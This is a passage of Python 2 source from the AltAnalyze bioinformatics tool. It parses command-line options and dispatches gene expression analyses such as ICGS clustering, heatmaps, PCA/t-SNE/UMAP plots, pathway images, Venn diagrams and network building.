mappedExonAnalysis = True
cel_file_dir = input_exp_file
exp_name = export.findFilename(input_exp_file)
exp_name = string.replace(exp_name,'.txt','')
exp_name = string.replace(exp_name,'exp.','')
input_exp_file = ''
### To perform alternative exon analyses for platforms without a dedicated database, must happing appropriate mapping info or array type data
### (will need to perform downstream testing for unsupported Affymetrix exon, gene and junction arrays)
if exonMapFile == None and specific_array_type == None and cel_file_dir == '':
print_out = "\nUnable to run!!! Please designate either a specific platfrom (e.g., --specificArray hgU133_2), select CEL files, or an "
print_out += "exon-level mapping file location (--exonMapFile C:/mapping.txt) to perform alternative exon analyses for this platform."
### Will need to check here to see if the platform is supported (local or online files) OR wait until an error is encountered later
""" Check to see if a database is already installed """
try: current_species_dirs = unique.read_directory('/AltDatabase')
except Exception: current_species_dirs=[]
if len(current_species_dirs)==0 and update_dbs != 'yes':
print "Please install a database before running AltAnalyze. Please note, AltAnalyze may need to install additional files later for RNASeq and LineageProfiler for some species, automatically. Make sure to list your platform as RNASeq if analyzing RNA-Seq data (--platform RNASeq)."
print "Example:\n"
print 'python AltAnalyze.py --species Hs --update Official --version EnsMart72';sys.exit()
######## Perform analyses independent from AltAnalyze database centric analyses that require additional parameters
if len(image_export) > 0 or len(accessoryAnalysis)>0 or runICGS:
""" Annotate existing ICGS groups with selected GO-Elite results """
if 'annotateICGS' in accessoryAnalysis:
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--elite_dir':
goelite_path = arg
import RNASeq
RNASeq.predictCellTypesFromClusters(groups_file, goelite_path)
sys.exit()
if runICGS:
#python AltAnalyze.py --runICGS yes --platform "RNASeq" --species Hs --column_method hopach --column_metric euclidean --rho 0.3 --ExpressionCutoff 1 --FoldDiff 4 --SamplesDiffering 3 --restrictBy protein_coding --excludeCellCycle conservative --removeOutliers yes --expdir /RNA-Seq/run1891_normalized.txt
#python AltAnalyze.py --runICGS yes --expdir "/Users/saljh8/Desktop/demo/Myoblast/ExpressionInput/exp.myoblast.txt" --platform "3'array" --species Hs --GeneSetSelection BioMarkers --PathwaySelection Heart --column_method hopach --rho 0.4 --ExpressionCutoff 200 --justShowTheseIDs "NKX2-5 T TBX5" --FoldDiff 10 --SamplesDiffering 3 --excludeCellCycle conservative
try: species = species
except Exception: 'Please designate a species before continuing (e.g., --species Hs)'
try: array_type = array_type
except Exception: 'Please designate a species before continuing (e.g., --species Hs)'
if len(cel_file_dir)>0: ### For BED files or BAM files
if len(cel_file_dir) > 0: pass
else: 'Please indicate a source folder (e.g., --bedDir /data/BAMFiles)'
else:
if len(input_exp_file) > 0: pass
else: 'Please indicate a source folder or expression file (e.g., --expdir /dataset/singleCells.txt)'
if array_type == 'Other' or 'Other' in array_type:
if ':' in array_type:
array_type, IDtype = string.split(array_type)
array_type == "3'array"
if IDtype == None: IDtype = manufacturer
row_method = 'hopach'
column_method = 'hopach'
row_metric = 'cosine'
column_metric = 'cosine'
color_gradient = 'yellow_black_blue'
contrast=3
vendor = manufacturer
GeneSelection = ''
PathwaySelection = ''
GeneSetSelection = 'None Selected'
excludeCellCycle = True
rho_cutoff = 0.2
restrictBy = None
featurestoEvaluate = 'Genes'
ExpressionCutoff = 1
CountsCutoff = 0.9
FoldDiff = 4
SamplesDiffering = 4
JustShowTheseIDs=''
removeOutliers = False
excludeGuides = None
PathwaySelection=[]
dynamicCorrelation=True
runCompleteWorkflow=False
downsample=2500
numGenesExp=500
if ChromiumSparseMatrix != '':
rho_cutoff = 0.2
column_metric = 'euclidean'
restrictBy = 'protein_coding'
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--row_method':
row_method=arg
if row_method == 'None': row_method = None
elif opt == '--column_method':
column_method=arg
if column_method == 'None': column_method = None
elif opt == '--row_metric': row_metric=arg
elif opt == '--column_metric': column_metric=arg
elif opt == '--color_gradient': color_gradient=arg
elif opt == '--GeneSetSelection': GeneSetSelection=arg
elif opt == '--PathwaySelection': PathwaySelection.append(arg)
elif opt == '--genes': GeneSelection=arg
elif opt == '--ExpressionCutoff': ExpressionCutoff=arg
elif opt == '--normalization': normalization=arg
elif opt == '--justShowTheseIDs': justShowTheseIDs=arg
elif opt == '--rho': rho_cutoff=float(arg)
elif opt == '--clusterGOElite':clusterGOElite=float(arg)
elif opt == '--CountsCutoff':CountsCutoff=int(float(arg))
elif opt == '--FoldDiff':FoldDiff=float(arg)
elif opt == '--SamplesDiffering':SamplesDiffering=int(float(arg))
elif opt == '--excludeGuides': excludeGuides=arg
elif opt == '--dynamicCorrelation': dynamicCorrelation=arg
elif opt == '--k': k=int(arg)
elif opt == '--downsample': downsample=int(arg)
elif opt == '--numGenesExp': numGenesExp=int(arg)
elif opt == '--runCompleteWorkflow':
runCompleteWorkflow=arg
if string.lower(arg)=='false' or string.lower(arg)=='no':
runCompleteWorkflow = False
else:
runCompleteWorkflow = True
elif opt == '--removeOutliers':
removeOutliers=arg
if removeOutliers=='yes' or removeOutliers=='True':
removeOutliers = True
elif opt == '--featurestoEvaluate':featurestoEvaluate=arg
elif opt == '--restrictBy':
if arg == 'None': restrictBy = None
else: restrictBy=arg
elif opt == '--excludeCellCycle':
excludeCellCycle=arg
if excludeCellCycle == 'False' or excludeCellCycle == 'no': excludeCellCycle = False
elif excludeCellCycle == 'True' or excludeCellCycle == 'yes' or excludeCellCycle == 'conservative': excludeCellCycle = True
elif opt == '--contrast':
try: contrast=float(arg)
except Exception: print '--contrast not a valid float';sys.exit()
elif opt == '--vendor': vendor=arg
elif opt == '--display':
if arg=='yes':
display=True
elif arg=='True':
display=True
else:
display=False
if excludeGuides!=None:
if '.txt' in excludeGuides:
try: excludeGuides = parseExcludeGuides(excludeGuides)
except Exception:
print 'Failure to parse input excludeGuides text file. Check to see if the correct file location is provided.'
sys.exit()
if len(PathwaySelection)==0: PathwaySelection=''
if len(GeneSetSelection)>0 or GeneSelection != '':
gsp = UI.GeneSelectionParameters(species,array_type,vendor)
gsp.setGeneSet(GeneSetSelection)
gsp.setPathwaySelect(PathwaySelection)
gsp.setGeneSelection(GeneSelection)
gsp.setJustShowTheseIDs(JustShowTheseIDs)
gsp.setNormalize('median')
gsp.setExcludeGuides(excludeGuides)
gsp.setK(k)
gsp.setDownsample(downsample)
gsp.setNumGenesExp(numGenesExp)
gsp.setSampleDiscoveryParameters(ExpressionCutoff,CountsCutoff,FoldDiff,SamplesDiffering, dynamicCorrelation,
removeOutliers,featurestoEvaluate,restrictBy,excludeCellCycle,column_metric,column_method,rho_cutoff)
import RNASeq
mlp_instance = mlp
if exp_name == None:
exp_name = export.findFilename(input_exp_file)
exp_name = string.replace(exp_name,'.txt','')
exp_name = string.replace(exp_name,'exp.','')
if cel_file_dir != '':
expFile = output_dir + '/ExpressionInput/'+ 'exp.'+exp_name+'.txt' ### cel_file_dir will point to the input directory
elif ChromiumSparseMatrix != '':
expFile = output_dir + '/ExpressionInput/'+ 'exp.'+exp_name+'.txt'
elif input_exp_file !='':
if 'ExpressionInput' in input_exp_file: expFile = input_exp_file
else:
### Copy over expression file to ExpressionInput
expdir2 = string.replace(input_exp_file,'exp.','')
if output_dir == None:
### Not suppplied, define relative to the input expression file
root_dir = export.findParentDir(input_exp_file)
else:
root_dir = output_dir
expFile = root_dir+'/ExpressionInput/exp.'+export.findFilename(expdir2)
export.copyFile(input_exp_file, expFile)
### Groups file if present to the output directory ExpressionInput folder
if 'exp.' in input_exp_file:
initial_groups = string.replace(input_exp_file,'exp.','groups.')
else:
initial_groups = export.findParentDir(input_exp_file)+'/groups.'+export.findFilename(input_exp_file)
try:
groups_file = string.replace(expFile,'exp.','groups.') ### destination file
export.copyFile(initial_groups, groups_file)
print 'Copied the groups file to ExpressionInput folder in the output directory'
except Exception:
print 'No groups file present in the input file folder.'
global log_file
try:
if len(output_dir)>0:
root_dir = output_dir
else:
forceError
except Exception:
try: root_dir = export.findParentDir(expFile)
except Exception:
print 'Please include an output directory for the AltAnalyze results (e.g., --output /Data/Results)';sys.exit()
root_dir = string.replace(root_dir,'/ExpressionInput','')
fl = UI.ExpressionFileLocationData('','','',''); fl.setFeatureNormalization('none')
try: fl.setExpFile(expFile)
except Exception:
expFile = root_dir+'/ExpressionInput/exp.'+exp_name+'.txt'
fl.setExpFile(expFile)
fl.setArrayType(array_type)
fl.setOutputDir(root_dir)
fl.setMultiThreading(multiThreading)
exp_file_location_db={}; exp_file_location_db[exp_name]=fl
### Assign variables needed to run Kallisto from FASTQ files
if runKallisto and len(input_fastq_dir)==0:
#python AltAnalyze.py --runICGS yes --platform "RNASeq" --species Mm --column_method hopach --rho 0.4 --ExpressionCutoff 1 --FoldDiff 4 --SamplesDiffering 1 --excludeCellCycle strict --output /Users/saljh8/Desktop/Grimes/GEC14074 --expname test --fastq_dir /Users/saljh8/Desktop/Grimes/GEC14074
print 'Please include the flag "--fastq_dir" in the command-line arguments with an appropriate path';sys.exit()
elif len(input_fastq_dir)>0:
fl.setRunKallisto(input_fastq_dir)
fl.setArrayType("3'array")
fl.setMultiThreading(multiThreading)
array_type = "3'array"
if customFASTA!=None:
fl.setCustomFASTA(customFASTA)
### Assign variables needed to run BAMtoBED and/or BED file count analysis
if len(cel_file_dir)>0 and array_type=='RNASeq':
#python AltAnalyze.py --runICGS yes --platform "RNASeq" --species Mm --column_method hopach --rho 0.4 --ExpressionCutoff 1 --FoldDiff 4 --SamplesDiffering 1 --excludeCellCycle strict --output /Users/saljh8/Desktop/Grimes/GEC14074 --expname test --bedDir /Users/saljh8/Desktop/Grimes/GEC14074 --multiProcessing no
fl.setCELFileDir(cel_file_dir)
fl.setMultiThreading(multiThreading)
fl.setExonBedBuildStatus('no')
fl.setFeatureNormalization('RPKM')
fl.setArrayType(array_type)
fl.setRootDir(root_dir)
### Import expression defaults
expr_defaults, alt_exon_defaults, functional_analysis_defaults, goelite_defaults = UI.importDefaults(array_type,species)
dabg_p, rpkm_threshold, gene_exp_threshold, exon_exp_threshold, exon_rpkm_threshold, expression_threshold, perform_alt_analysis, analyze_as_groups, expression_data_format, normalize_feature_exp, normalize_gene_data, avg_all_for_ss, include_raw_data, probability_statistic, FDR_statistic, batch_effects, marker_finder, visualize_qc_results, run_lineage_profiler, null = expr_defaults
fl.setRPKMThreshold(rpkm_threshold)
fl.setExonExpThreshold(exon_exp_threshold)
fl.setGeneExpThreshold(gene_exp_threshold)
fl.setExonRPKMThreshold(exon_rpkm_threshold)
fl.setJunctionExpThreshold(expression_threshold)
elif len(ChromiumSparseMatrix)>0:
#python AltAnalyze.py --runICGS yes --platform "RNASeq" --species Mm --column_method hopach --rho 0.4 --ExpressionCutoff 1 --FoldDiff 4 --SamplesDiffering 1 --excludeCellCycle strict --output /Users/saljh8/Desktop/Grimes/GEC14074 --expname test --ChromiumSparseMatrix /Users/saljh8/Desktop/Grimes/GEC14074 --multiProcessing no
fl.setChromiumSparseMatrix(ChromiumSparseMatrix)
fl.setMultiThreading(multiThreading)
fl.setArrayType("3'array")
array_type = "3'array"
fl.setRootDir(root_dir)
elif len(input_exp_file)>0:
### Dealing with an expression file which should not be treated as RNASeq workflow
count = verifyFileLength(expFile[:-4]+'-steady-state.txt')
if count<2:
if array_type != 'PSI' and array_type != 'exons':
array_type = "3'array" ### No steady-state file, must be an standard gene-level analysis
time_stamp = timestamp()
log_file = filepath(root_dir+'/AltAnalyze_report-'+time_stamp+'.log')
log_report = open(log_file,'w'); log_report.close()
sys.stdout = Logger('')
print "\nFull commandline:"
try: print string.join(arguments,' ')
except Exception: pass
print ''
count = verifyFileLength(expFile[:-4]+'-steady-state.txt')
exonExpFile = str(expFile)
if count>1:
expFile = expFile[:-4]+'-steady-state.txt'
elif array_type=='RNASeq' or len(ChromiumSparseMatrix)>0 or len(input_fastq_dir)>0:
try:
### Indicates that the steady-state file doesn't exist. The exp. may exist, be could be junction only so need to re-build from bed files here
values = species,exp_file_location_db,exp_name,mlp_instance
### proceed to run the full discovery analysis here (Kallisto, BAM, BED, Chromium matrix)
UI.StatusWindow(values,'preProcessRNASeq') ### proceed to run the full discovery analysis here!!!
SteadyStateFile = expFile[:-4]+'-steady-state.txt'
status = verifyFile(SteadyStateFile)
if status == "found":
#fl.setExpFile(SteadyStateFile) ### This should not be over-written by a steady-state file
expFile = SteadyStateFile
except Exception:
### RNASeq is an official datatype that requires a steady-state file. However, for scRNA-Seq, usually the input is a text file or FASTQ which gets
### changed to "3'array". We correct for this by excepting this error without doing anything else
#print traceback.format_exc();sys.exit()
pass
if excludeCellCycle != False:
print "Excluding Cell Cycle effects status:",excludeCellCycle
### Run ICGS through the GUI
graphic_links = UI.RemotePredictSampleExpGroups(expFile, mlp_instance, gsp,(species,array_type)) ### proceed to run the full discovery analysis here!!!
### Export Guide3 Groups automatically
Guide3_results = graphic_links[-1][-1][:-4]+'.txt'
new_groups_dir = RNASeq.exportGroupsFromClusters(Guide3_results,fl.ExpFile(),array_type,suffix='ICGS')
exonExpFile,newExpFile,new_groups_dir = UI.exportAdditionalICGSOutputs(expFile,Guide3_results,outputTSNE=True)
fl.setExpFile(newExpFile) ### set this to the outlier removed version
comps_file = string.replace(new_groups_dir,'groups.','comps.')
fl.setGroupsFile(new_groups_dir)
fl.setCompsFile(comps_file)
exp_file_location_db[exp_name+'-ICGS'] = fl
### force MarkerFinder to be run
input_exp_file = newExpFile ### Point MarkerFinder to the new ICGS ordered copied expression file
runMarkerFinder=True ### Not necessary for ICGS2 as MarkerFinder will already have been run - but good for other ICGS outputs
if runMarkerFinder:
update_method = ['markers']
if runCompleteWorkflow == False:
print 'ICGS run complete... halted prior to full differential comparison analysis'
sys.exit()
if 'WikiPathways' in image_export:
#python AltAnalyze.py --input /Users/test/input/criterion1.txt --image WikiPathways --mod Ensembl --species Hs --wpid WP536
if wpid==None:
print 'Please provide a valid WikiPathways ID (e.g., WP1234)';sys.exit()
if species==None:
print 'Please provide a valid species ID for an installed database (to install: --update Official --species Hs --version EnsMart72Plus)';sys.exit()
if input_file_dir==None:
print 'Please provide a valid file location for your input IDs (also needs to inlcude system code and value column)';sys.exit()
from visualization_scripts import WikiPathways_webservice
try:
print 'Attempting to output a WikiPathways colored image from user data'
print 'mod:',mod
print 'species_code:',species
print 'wpid:',wpid
print 'input GO-Elite ID file:',input_file_dir
graphic_link = WikiPathways_webservice.visualizePathwayAssociations(input_file_dir,species,mod,wpid)
except Exception,e:
if 'force_no_matching_error' in traceback.format_exc():
print '\nUnable to run!!! None of the input IDs mapped to this pathway\n'
elif 'IndexError' in traceback.format_exc():
print '\nUnable to run!!! Input ID file does not have at least 3 columns, with the second column being system code\n'
elif 'ValueError' in traceback.format_exc():
print '\nUnable to run!!! Input ID file error. Please check that you do not have extra rows with no data\n'
elif 'source_data' in traceback.format_exc():
print '\nUnable to run!!! Input ID file does not contain a valid system code\n'
elif 'goelite' in traceback.format_exc():
print '\nUnable to run!!! A valid species database needs to first be installed. For example, run:'
print 'python AltAnalyze.py --update Official --species Hs --version EnsMart72\n'
else:
print traceback.format_exc()
print '\nError generating the pathway "%s"' % wpid,'\n'
try:
printout = 'Finished exporting visualized pathway to:',graphic_link['WP']
print printout,'\n'
except Exception: None
sys.exit()
if 'FilterFile' in accessoryAnalysis:
    ### Restrict/re-order the columns of an expression file according to a
    ### filter file, write the result next to the input, then exit.
    for flag, value in options:
        if flag == '--filterFile':
            filterFile = value
        elif flag == '--input':
            input_file = verifyPath(value)
    output_file = input_file[:-4] + '-filtered.txt' ### swap the 4-char extension for '-filtered.txt'
    from import_scripts import sampleIndexSelection
    filter_order = sampleIndexSelection.getFilters(filterFile)
    sampleIndexSelection.filterFile(input_file, output_file, filter_order)
    sys.exit()
if 'MergeFiles' in accessoryAnalysis:
#python AltAnalyze.py --accessoryAnalysis MergeFiles --input "C:\file1.txt" --input "C:\file2.txt" --output "C:\tables"
files_to_merge=[]
join_option='Intersection'
uniqueOnly=False
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--input':
arg = verifyPath(arg)
files_to_merge.append(arg)
if opt == '--join': join_option = arg
if opt == '--uniqueOnly': unique_only = arg
if len(files_to_merge)<2:
print 'Please designate two or more files to merge (--input)';sys.exit()
UI.MergeFiles(files_to_merge, join_option, uniqueOnly, output_dir, None)
sys.exit()
if 'IDTranslation' in accessoryAnalysis:
#python AltAnalyze.py --accessoryAnalysis IDTranslation --inputIDType Symbol --outputIDType RefSeq --input "C:\file1.txt" --species Hs
inputIDType=None
outputIDType=None
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--inputIDType': inputIDType = arg
if opt == '--outputIDType': outputIDType = arg
if inputIDType==None or outputIDType==None:
print 'Please designate an input ID type and and output ID type (--inputIDType Ensembl --outputIDType Symbol)'; sys.exit()
if species==None:
print "Please enter a valide species (--species)"; sys.exit()
UI.IDconverter(input_file_dir, species, inputIDType, outputIDType, None)
sys.exit()
if 'hierarchical' in image_export:
    ### Stand-alone hierarchical clustering / heatmap export from the command line.
    #python AltAnalyze.py --input "/Users/test/pluri.txt" --image hierarchical --row_method average --column_method single --row_metric cosine --column_metric euclidean --color_gradient red_white_blue --transpose False --PathwaySelection Apoptosis:WP254 --GeneSetSelection WikiPathways --species Hs --platform exon --display false
    if input_file_dir==None:
        print 'Please provide a valid file location for your input data matrix (must have an annotation row and an annotation column)';sys.exit()
    ### Defaults used when the corresponding flags are absent
    row_method = 'weighted'
    column_method = 'average'
    row_metric = 'cosine'
    column_metric = 'cosine'
    color_gradient = 'red_black_sky'
    contrast=2.5
    vendor = 'Affymetrix'
    GeneSelection = ''
    PathwaySelection = ''
    GeneSetSelection = 'None Selected'
    rho = None
    for opt, arg in options: ### Accept user input for these hierarchical clustering variables
        if opt == '--row_method':
            row_method=arg
            if row_method == 'None': row_method = None
        elif opt == '--column_method':
            column_method=arg
            if column_method == 'None': column_method = None
        elif opt == '--row_metric': row_metric=arg
        elif opt == '--column_metric': column_metric=arg
        elif opt == '--color_gradient': color_gradient=arg
        elif opt == '--GeneSetSelection': GeneSetSelection=arg
        elif opt == '--PathwaySelection': PathwaySelection=arg
        elif opt == '--genes': GeneSelection=arg
        elif opt == '--OntologyID': OntologyID=arg
        elif opt == '--normalization': normalization=arg
        elif opt == '--justShowTheseIDs': justShowTheseIDs=arg
        elif opt == '--rho': rho=arg
        elif opt == '--clusterGOElite':clusterGOElite=arg
        elif opt == '--contrast':
            try: contrast=float(arg)
            except Exception: print '--contrast not a valid float';sys.exit()
        elif opt == '--vendor': vendor=arg
        elif opt == '--display':
            if arg=='yes':
                display=True
            elif arg=='True':
                display=True
            else:
                display=False
    ### NOTE(review): GeneSetSelection defaults to 'None Selected' (len>0), so this
    ### branch appears to always be taken - confirm intended
    if len(GeneSetSelection)>0 or GeneSelection != '':
        gsp = UI.GeneSelectionParameters(species,array_type,vendor)
        gsp.setGeneSet(GeneSetSelection)
        gsp.setPathwaySelect(PathwaySelection)
        gsp.setGeneSelection(GeneSelection)
        gsp.setOntologyID(OntologyID)
        gsp.setTranspose(transpose)
        gsp.setNormalize(normalization)
        gsp.setJustShowTheseIDs(justShowTheseIDs)
        try: gsp.setClusterGOElite(clusterGOElite)
        except Exception: pass
        if rho!=None:
            try:
                float(rho) ### validate only; the original (string) value is passed through
                gsp.setRhoCutoff(rho)
            except Exception: print 'Must enter a valid Pearson correlation cutoff (float)'
        transpose = gsp ### this allows methods that don't transmit this object to also work
    if row_method == 'no': row_method = None
    if column_method == 'no': column_method = None
    if len(GeneSetSelection)>0:
        if species == None:
            print "Please enter a valide species (--species)"; sys.exit()
    ### If a directory was supplied, cluster every file in it; otherwise fall back
    ### to clustering the single input file.
    try:
        files = unique.read_directory(input_file_dir+'/')
        dir = input_file_dir
        for file in files:
            filename = dir+'/'+file
            UI.createHeatMap(filename, row_method, row_metric, column_method, column_metric, color_gradient, transpose, contrast, None, display=display)
    except Exception:
        UI.createHeatMap(input_file_dir, row_method, row_metric, column_method, column_metric, color_gradient, transpose, contrast, None, display=display)
    #from visualization_scripts import clustering; clustering.outputClusters([input_file_dir],[])
    sys.exit()
if 'PCA' in image_export or 't-SNE' in image_export or 'UMAP' in image_export or 'umap' in image_export:
    ### Stand-alone dimensionality-reduction plots (PCA / t-SNE / UMAP) from the command line.
    #AltAnalyze.py --input "/Users/nsalomonis/Desktop/folds.txt" --image PCA --plotType 3D --display True --labels yes
    #python AltAnalyze.py --input "/Users/nsalomonis/Desktop/log2_expression.txt" --image "t-SNE" --plotType 2D --display True --labels no --genes "ACTG2 ARHDIA KRT18 KRT8 ATP2B1 ARHGDIB" --species Hs --platform RNASeq --separateGenePlots True --zscore no
    #--algorithm "t-SNE"
    include_labels = 'yes'
    plotType = '2D'
    pca_algorithm = 'SVD'
    geneSetName = None
    zscore = True
    colorByGene=None
    separateGenePlots = False
    reimportModelScores = True ### presumably re-uses previously saved model scores - confirm in UI.performPCA
    maskGroups = None
    ### The requested image type overrides the default SVD algorithm
    if 't-SNE' in image_export:
        pca_algorithm = 't-SNE'
    if 'UMAP' in image_export or 'umap' in image_export:
        pca_algorithm = 'UMAP'
    for opt, arg in options: ### Accept user input for these plot variables
        #print opt,arg
        if opt == '--labels':
            include_labels=arg
            if include_labels == 'True' or include_labels == 'yes':
                include_labels = 'yes'
            else:
                include_labels = 'no'
        if opt == '--plotType': plotType=arg
        if opt == '--algorithm': pca_algorithm=arg
        if opt == '--geneSetName': geneSetName=arg
        if opt == '--genes': colorByGene=arg
        if opt == '--maskGroups': maskGroups=arg
        if opt == '--reimportModelScores':
            if arg == 'yes' or arg == 'True' or arg == 'true':
                reimportModelScores = True
            else:
                reimportModelScores = False
        if opt == '--separateGenePlots':
            if arg=='yes' or arg=='True' or arg == 'true':
                separateGenePlots = True
            else:
                separateGenePlots = False
        if opt == '--zscore':
            if arg=='yes' or arg=='True' or arg == 'true':
                zscore=True
            else:
                zscore=False
        if opt == '--display':
            if arg=='yes' or arg=='True' or arg == 'true':
                display=True
    if input_file_dir==None:
        print 'Please provide a valid file location for your input data matrix (must have an annotation row and an annotation column)';sys.exit()
    UI.performPCA(input_file_dir, include_labels, pca_algorithm, transpose, None,
        plotType=plotType, display=display, geneSetName=geneSetName, species=species, zscore=zscore,
        colorByGene=colorByGene, reimportModelScores=reimportModelScores, separateGenePlots=separateGenePlots,
        maskGroups=maskGroups)
    sys.exit()
if 'VennDiagram' in image_export:
# AltAnalyze.py --image "VennDiagram" --input "C:\file1.txt" --input "C:\file2.txt" --output "C:\graphs"
files_to_merge=[]
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--input':
arg = verifyPath(arg)
files_to_merge.append(arg)
if opt == '--display':
if arg=='yes' or arg=='True' or arg == 'true':
display=True
if len(files_to_merge)<2:
print 'Please designate two or more files to compare (--input)';sys.exit()
UI.vennDiagram(files_to_merge, output_dir, None, display=display)
sys.exit()
if 'AltExonViewer' in image_export:
    ### Plot exon-level expression/splicing scores (or Sashimi plots) for selected genes.
    #python AltAnalyze.py --image AltExonViewer --AltResultsDir "C:\CP-hESC" --genes "ANXA7 FYN TCF3 NAV2 ETS2 MYLK ATP2A2" --species Hs --platform exon --dataType "splicing-index"
    genes=[]
    show_introns='no'
    geneFileDir=''
    analysisType='plot'
    ### NOTE(review): data_type and altresult_dir are assumed to be initialized earlier
    ### in the enclosing function; if not supplied via flags they are read below - verify
    for opt, arg in options: ### Accept user input for these viewer variables
        if opt == '--genes':genes=arg
        elif opt == '--dataType': data_type = arg
        elif opt == '--showIntrons': show_introns = arg
        elif opt == '--AltResultsDir': altresult_dir = arg
        elif opt == '--geneFileDir': geneFileDir = arg
        elif opt == '--analysisType': analysisType=arg
    if altresult_dir == None:
        print 'Please include the location of the AltResults directory (--AltResultsDir)'; sys.exit()
    if len(genes)==0 and len(geneFileDir)==0:
        print "Please indicate the genes (--genes) or gene file location (--geneFileDir) for AltExonViewer";sys.exit()
    if species == None:
        print "Please enter a valide species (--species)"; sys.exit()
    if array_type == None:
        print "Please enter a valide platform (--platform)"; sys.exit()
    if 'AltResults' not in altresult_dir:
        altresult_dir+='/AltResults/'
    if 'Sashimi' in analysisType:
        #python AltAnalyze.py --image AltExonViewer --AltResultsDir "/Users/saljh8/Desktop/Grimes/GEC14074/AltResults/" --genes "Dgat1 Dgat2 Tcf7l1" --species Mm --platform RNASeq --analysisType SashimiPlot
        analysisType = 'Sashimi-Plot'
        altresult_dir = string.split(altresult_dir,'AltResults')[0] ### Sashimi plots read from the project root
        if len(geneFileDir)>0: genes = geneFileDir
        geneFileDir=''
    elif 'raw' in data_type: ### Switch directories if expression
        altanalyze_results_folder = string.replace(altresult_dir,'AltResults','ExpressionInput')
        altresult_dir = UI.getValidExpFile(altanalyze_results_folder)
        if len(altresult_dir)==0:
            print 'No valid expression input file (e.g., exp.MyExperiment.txt) found in',altanalyze_results_folder;sys.exit()
    else:
        ### Default: locate a splicing-score file under RawSpliceData
        altanalyze_results_folder = altresult_dir+'/RawSpliceData/'+species
        try: altresult_dir = UI.getValidSplicingScoreFile(altanalyze_results_folder)
        except Exception,e:
            print "No files found in: "+altanalyze_results_folder; sys.exit()
    if len(geneFileDir)>0:
        try:
            genes = UI.importGeneList(geneFileDir) ### list of gene IDs or symbols
        except Exception:
            ### Can occur if a directory of files is selected
            try:
                files = unique.read_directory(geneFileDir+'/')
                gene_string=''
                for file in files:
                    if '.txt' in file:
                        filename = geneFileDir+'/'+file
                        genes = UI.importGeneList(filename) ### list of gene IDs or symbols
                        gene_string = gene_string+','+genes
                        print 'Imported genes from',file,'\n'
                #print [altresult_dir];sys.exit()
                UI.altExonViewer(species,platform,altresult_dir, gene_string, show_introns, analysisType, False)
            except Exception: pass
        sys.exit()
    if len(genes)==0:
        print 'Please list one or more genes (--genes "ANXA7 FYN TCF3 NAV2 ETS2 MYLK ATP2A2")'; sys.exit()
    try: UI.altExonViewer(species,platform,altresult_dir, genes, show_introns, analysisType, False)
    except Exception:
        print traceback.format_exc()
    sys.exit()
if 'network' in image_export:
#AltAnalyze.py --image network --species Hs --output "C:\GSE9440_RAW" --PathwaySelection Apoptosis:WP254 --GeneSetSelection WikiPathways
for opt, arg in options: ### Accept user input for these hierarchical clustering variables
if opt == '--update_interactions': update_interactions=arg
elif opt == '--includeExpIDs': includeExpIDs=arg
elif opt == '--degrees': degrees=arg
elif opt == '--genes':
Genes=arg
inputType = 'IDs'
elif opt == '--inputType': inputType=arg
elif opt == '--interactionDirs': interactionDirs.append(arg)
elif opt == '--GeneSetSelection': GeneSetSelection=arg
elif opt == '--PathwaySelection': PathwaySelection=arg
elif opt == '--OntologyID': OntologyID=arg
elif opt == '--display': display=arg
if update_interactions == 'yes': update_interactions = True
else: update_interactions = False
if input_file_dir == None: pass
elif len(input_file_dir) == 0: input_file_dir = None
if len(input_exp_file) == 0: input_exp_file = None
if len(interactionDirs) == 0: interactionDirs=['WikiPathways']
if interactionDirs == ['all']:
interactionDirs = ['WikiPathways','KEGG','BioGRID','TFTargets','common-microRNATargets','all-microRNATargets','common-DrugBank','all-DrugBank']
if interactionDirs == ['main']:
interactionDirs = ['WikiPathways','KEGG','BioGRID','TFTargets']
if interactionDirs == ['confident']:
interactionDirs = ['WikiPathways','KEGG','TFTargets']
if len(Genes) == 0: Genes = None
if output_dir == None: pass
elif len(output_dir) == 0: output_dir = None
if len(GeneSetSelection) == 'None Selected': GeneSetSelection = None
if includeExpIDs=='yes': includeExpIDs = True
else: includeExpIDs = False
gsp = UI.GeneSelectionParameters(species,array_type,manufacturer)
gsp.setGeneSet(GeneSetSelection)
gsp.setPathwaySelect(PathwaySelection)
gsp.setGeneSelection(Genes)
gsp.setOntologyID(OntologyID)
gsp.setIncludeExpIDs(includeExpIDs)
root = ''
if species == None:
print 'Please designate a species (--species).'; sys.exit()
if output_dir == None:
print 'Please designate an ouput directory (--output)'; sys.exit()
if input_file_dir !=None:
if '.txt' in input_file_dir or '.sif' in input_file_dir:
UI.networkBuilder(input_file_dir,inputType,output_dir,interactionDirs,degrees,input_exp_file,gsp,root)
else:
parent_dir = input_file_dir
dir_list = read_directory(parent_dir)
for file in dir_list:
input_file_dir = parent_dir+'/'+file
try:
UI.networkBuilder(input_file_dir,inputType,output_dir,interactionDirs,degrees,input_exp_file,gsp,root)
except Exception:
print file, 'failed to produce network'
else:
UI.networkBuilder(None,inputType,output_dir,interactionDirs,degrees,input_exp_file,gsp,root)
sys.exit()
########## Begin database dependent AltAnalyze workflows
### Record the requested Ensembl build as the active database version
if ensembl_version != 'current' and 'markers' not in update_method:
    dbversion = string.replace(ensembl_version,'EnsMart','')
    UI.exportDBversion('EnsMart'+dbversion)
gene_database = unique.getCurrentGeneDatabaseVersion()
print 'Current database version:',gene_database
### A platform is mandatory unless updating databases; denom_file_dir presumably
### covers the GO-Elite denominator path - confirm against the enclosing function
if array_type == None and update_dbs != 'yes' and denom_file_dir == None:
    print "Please specify an array or data type (e.g., RNASeq, exon, gene, junction, AltMouse, 3'array)."; sys.exit()
if 'archive' in update_method:
    ### Move per-species database zip files into an 'archive' subdirectory of ArchiveDBs.
    print 'Archiving databases', ensembl_version
    try: archive_dir = 'ArchiveDBs/EnsMart'+ensembl_version+'/archive'; export.createDirPath(filepath(archive_dir))
    except Exception: null = [] ### directory already exists
    dirs = unique.read_directory('/ArchiveDBs/EnsMart'+ensembl_version)
    print len(dirs), dirs
    import shutil
    for species_dir in dirs:
        try:
            #print '/ArchiveDBs/EnsMart'+ensembl_version+'/'+species_dir+'/'+species_dir+'_RNASeq.zip'
            src = filepath('ArchiveDBs/EnsMart'+ensembl_version+'/'+species_dir+'/'+species_dir+'_RNASeq.zip')
            dstn = filepath('ArchiveDBs/EnsMart'+ensembl_version+'/archive/'+species_dir+'_RNASeq.zip')
            #export.copyFile(src, dstn)
